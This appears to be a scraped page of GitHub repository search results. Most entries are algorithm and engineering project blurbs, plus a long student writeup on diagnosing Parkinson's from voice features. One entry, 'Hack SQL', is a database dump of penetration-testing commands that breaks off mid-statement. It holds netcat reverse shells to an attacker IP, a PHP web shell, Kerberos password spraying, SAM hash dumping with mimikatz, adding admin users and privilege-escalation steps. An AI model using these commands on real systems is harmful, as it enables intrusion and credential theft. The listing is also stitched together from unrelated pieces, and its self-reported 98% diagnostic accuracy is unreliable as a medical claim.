258 skills found · Page 1 of 9
datawhalechina / Fun Rec推荐系统入门教程,在线阅读地址:https://datawhalechina.github.io/fun-rec/
ashishpatel26 / Amazing Feature EngineeringFeature engineering is the process of using domain knowledge to extract features from raw data via data mining techniques. These features can be used to improve the performance of machine learning algorithms. Feature engineering can be considered as applied machine learning itself.
AIDotNet / Auto PromptAI Prompt Optimization Platform is a professional prompt engineering tool designed to help users optimize AI model prompts, enhancing the effectiveness and accuracy of AI interactions. The platform integrates intelligent optimization algorithms, deep reasoning analysis, visualization debugging tools, and community sharing features, providing compre
hellokoding / Hellokoding CoursesHelloKoding provides practical coding guides series of Spring Boot, Java, Algorithms, and other topics on software engineering
kahypar / KahyparKaHyPar (Karlsruhe Hypergraph Partitioning) is a multilevel hypergraph partitioning framework providing direct k-way and recursive bisection based partitioning algorithms that compute solutions of very high quality.
KaHIP / KaHIPKaHIP -- HIGH Quality Partitioning.
sadanandpai / Dsa Interview ChallengesA curated list of data structures and algorithms problems along with the solution in JavaScript to crack engineering interviews
int4444 / Tiktok ApiTikTok Reverse Engineering - Security Algorithms - Scrap and Automate TikTok
Aastha2104 / Parkinson Disease PredictionIntroduction Parkinson’s Disease is the second most prevalent neurodegenerative disorder after Alzheimer’s, affecting more than 10 million people worldwide. Parkinson’s is characterized primarily by the deterioration of motor and cognitive ability. There is no single test which can be administered for diagnosis. Instead, doctors must perform a careful clinical analysis of the patient’s medical history. Unfortunately, this method of diagnosis is highly inaccurate. A study from the National Institute of Neurological Disorders finds that early diagnosis (having symptoms for 5 years or less) is only 53% accurate. This is not much better than random guessing, but an early diagnosis is critical to effective treatment. Because of these difficulties, I investigate a machine learning approach to accurately diagnose Parkinson’s, using a dataset of various speech features (a non-invasive yet characteristic tool) from the University of Oxford. Why speech features? Speech is very predictive and characteristic of Parkinson’s disease; almost every Parkinson’s patient experiences severe vocal degradation (inability to produce sustained phonations, tremor, hoarseness), so it makes sense to use voice to diagnose the disease. Voice analysis gives the added benefit of being non-invasive, inexpensive, and very easy to extract clinically. Background Parkinson's Disease Parkinson’s is a progressive neurodegenerative condition resulting from the death of the dopamine containing cells of the substantia nigra (which plays an important role in movement). Symptoms include: “frozen” facial features, bradykinesia (slowness of movement), akinesia (impairment of voluntary movement), tremor, and voice impairment. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine have been depleted. Performance Metrics TP = true positive, FP = false positive, TN = true negative, FN = false negative Accuracy: (TP+TN)/(P+N) Matthews Correlation Coefficient: 1=perfect, 0=random, -1=completely inaccurate Algorithms Employed Logistic Regression (LR): Uses the sigmoid logistic equation with weights (coefficient values) and biases (constants) to model the probability of a certain class for binary classification. An output of 1 represents one class, and an output of 0 represents the other. Training the model will learn the optimal weights and biases. Linear Discriminant Analysis (LDA): Assumes that the data is Gaussian and each feature has the same variance. LDA estimates the mean and variance for each class from the training data, and then uses properties of statistics (Bayes theorem , Gaussian distribution, etc) to compute the probability of a particular instance belonging to a given class. The class with the largest probability is the prediction. k Nearest Neighbors (KNN): Makes predictions about the validation set using the entire training set. KNN makes a prediction about a new instance by searching through the entire set to find the k “closest” instances. “Closeness” is determined using a proximity measurement (Euclidean) across all features. The class that the majority of the k closest instances belong to is the class that the model predicts the new instance to be. Decision Tree (DT): Represented by a binary tree, where each root node represents an input variable and a split point, and each leaf node contains an output used to make a prediction. Neural Network (NN): Models the way the human brain makes decisions. Each neuron takes in 1+ inputs, and then uses an activation function to process the input with weights and biases to produce an output. Neurons can be arranged into layers, and multiple layers can form a network to model complex decisions. Training the network involves using the training instances to optimize the weights and biases. Naive Bayes (NB): Simplifies the calculation of probabilities by assuming that all features are independent of one another (a strong but effective assumption). Employs Bayes Theorem to calculate the probabilities that the instance to be predicted is in each class, then finds the class with the highest probability. Gradient Boost (GB): Generally used when seeking a model with very high predictive performance. Used to reduce bias and variance (“error”) by combining multiple “weak learners” (not very good models) to create a “strong learner” (high performance model). Involves 3 elements: a loss function (error function) to be optimized, a weak learner (decision tree) to make predictions, and an additive model to add trees to minimize the loss function. Gradient descent is used to minimize error after adding each tree (one by one). Engineering Goal Produce a machine learning model to diagnose Parkinson’s disease given various features of a patient’s speech with at least 90% accuracy and/or a Matthews Correlation Coefficient of at least 0.9. Compare various algorithms and parameters to determine the best model for predicting Parkinson’s. Dataset Description Source: the University of Oxford 195 instances (147 subjects with Parkinson’s, 48 without Parkinson’s) 22 features (elements that are possibly characteristic of Parkinson’s, such as frequency, pitch, amplitude / period of the sound wave) 1 label (1 for Parkinson’s, 0 for no Parkinson’s) Project Pipeline pipeline Summary of Procedure Split the Oxford Parkinson’s Dataset into two parts: one for training, one for validation (evaluate how well the model performs) Train each of the following algorithms with the training set: Logistic Regression, Linear Discriminant Analysis, k Nearest Neighbors, Decision Tree, Neural Network, Naive Bayes, Gradient Boost Evaluate results using the validation set Repeat for the following training set to validation set splits: 80% training / 20% validation, 75% / 25%, and 70% / 30% Repeat for a rescaled version of the dataset (scale all the numbers in the dataset to a range from 0 to 1: this helps to reduce the effect of outliers) Conduct 5 trials and average the results Data a_o a_r m_o m_r Data Analysis In general, the models tended to perform the best (both in terms of accuracy and Matthews Correlation Coefficient) on the rescaled dataset with a 75-25 train-test split. The two highest performing algorithms, k Nearest Neighbors and the Neural Network, both achieved an accuracy of 98%. The NN achieved a MCC of 0.96, while KNN achieved a MCC of 0.94. These figures outperform most existing literature and significantly outperform current methods of diagnosis. Conclusion and Significance These robust results suggest that a machine learning approach can indeed be implemented to significantly improve diagnosis methods of Parkinson’s disease. Given the necessity of early diagnosis for effective treatment, my machine learning models provide a very promising alternative to the current, rather ineffective method of diagnosis. Current methods of early diagnosis are only 53% accurate, while my machine learning model produces 98% accuracy. This 45% increase is critical because an accurate, early diagnosis is needed to effectively treat the disease. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine have been depleted. With an earlier diagnosis, much of this degradation could have been slowed or treated. My results are very significant because Parkinson’s affects over 10 million people worldwide who could benefit greatly from an early, accurate diagnosis. Not only is my machine learning approach more accurate in terms of diagnostic accuracy, it is also more scalable, less expensive, and therefore more accessible to people who might not have access to established medical facilities and professionals. The diagnosis is also much simpler, requiring only a 10-15 second voice recording and producing an immediate diagnosis. Future Research Given more time and resources, I would investigate the following: Create a mobile application which would allow the user to record his/her voice, extract the necessary vocal features, and feed it into my machine learning model to diagnose Parkinson’s. Use larger datasets in conjunction with the University of Oxford dataset. Tune and improve my models even further to achieve even better results. Investigate different structures and types of neural networks. Construct a novel algorithm specifically suited for the prediction of Parkinson’s. Generalize my findings and algorithms for all types of dementia disorders, such as Alzheimer’s. References Bind, Shubham. "A Survey of Machine Learning Based Approaches for Parkinson Disease Prediction." International Journal of Computer Science and Information Technologies 6 (2015): n. pag. International Journal of Computer Science and Information Technologies. 2015. Web. 8 Mar. 2017. Brooks, Megan. "Diagnosing Parkinson's Disease Still Challenging." Medscape Medical News. National Institute of Neurological Disorders, 31 July 2014. Web. 20 Mar. 2017. Exploiting Nonlinear Recurrence and Fractal Scaling Properties for Voice Disorder Detection', Little MA, McSharry PE, Roberts SJ, Costello DAE, Moroz IM. BioMedical Engineering OnLine 2007, 6:23 (26 June 2007) Hashmi, Sumaiya F. "A Machine Learning Approach to Diagnosis of Parkinson’s Disease."Claremont Colleges Scholarship. Claremont College, 2013. Web. 10 Mar. 2017. Karplus, Abraham. "Machine Learning Algorithms for Cancer Diagnosis." Machine Learning Algorithms for Cancer Diagnosis (n.d.): n. pag. Mar. 2012. Web. 20 Mar. 2017. Little, Max. "Parkinsons Data Set." UCI Machine Learning Repository. University of Oxford, 26 June 2008. Web. 20 Feb. 2017. Ozcift, Akin, and Arif Gulten. "Classifier Ensemble Construction with Rotation Forest to Improve Medical Diagnosis Performance of Machine Learning Algorithms." Computer Methods and Programs in Biomedicine 104.3 (2011): 443-51. Semantic Scholar. 2011. Web. 15 Mar. 2017. "Parkinson’s Disease Dementia." UCI MIND. N.p., 19 Oct. 2015. Web. 17 Feb. 2017. Salvatore, C., A. Cerasa, I. Castiglioni, F. Gallivanone, A. Augimeri, M. Lopez, G. Arabia, M. Morelli, M.c. Gilardi, and A. Quattrone. "Machine Learning on Brain MRI Data for Differential Diagnosis of Parkinson's Disease and Progressive Supranuclear Palsy."Journal of Neuroscience Methods 222 (2014): 230-37. 2014. Web. 18 Mar. 2017. Shahbakhi, Mohammad, Danial Taheri Far, and Ehsan Tahami. "Speech Analysis for Diagnosis of Parkinson’s Disease Using Genetic Algorithm and Support Vector Machine."Journal of Biomedical Science and Engineering 07.04 (2014): 147-56. Scientific Research. July 2014. Web. 2 Mar. 2017. "Speech and Communication." Speech and Communication. Parkinson's Disease Foundation, n.d. Web. 22 Mar. 2017. Sriram, Tarigoppula V. S., M. Venkateswara Rao, G. V. Satya Narayana, and D. S. V. G. K. Kaladhar. "Diagnosis of Parkinson Disease Using Machine Learning and Data Mining Systems from Voice Dataset." SpringerLink. Springer, Cham, 01 Jan. 1970. Web. 17 Mar. 2017.
kahypar / Mt KahyparMt-KaHyPar (Multi-Threaded Karlsruhe Hypergraph Partitioner) is a shared-memory multilevel graph and hypergraph partitioner equipped with parallel implementations of techniques used in the best sequential partitioning algorithms. Mt-KaHyPar can partition extremely large hypergraphs very fast and with high quality.
TheGeekiestOne / Coursera Data Structures And Algorithms SpecializationMaster Algorithmic Programming Techniques. Learn algorithms through programming and advance your software engineering or data science career
rmcmillan34 / Algorithmic Trading Learning RoadmapA comprehensive learning roadmap for mastering the core disciplines necessary for successful sole algorithmic trading. This repository serves as a structured template, guiding users through essential topics in software engineering, data science, machine learning, and finance. It combines certifications, curated resources, and hands-on projects.
nalajcie / Tuya Sign HackingTools for reverse-engineering and description of new TUYA API sign algorithm
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, 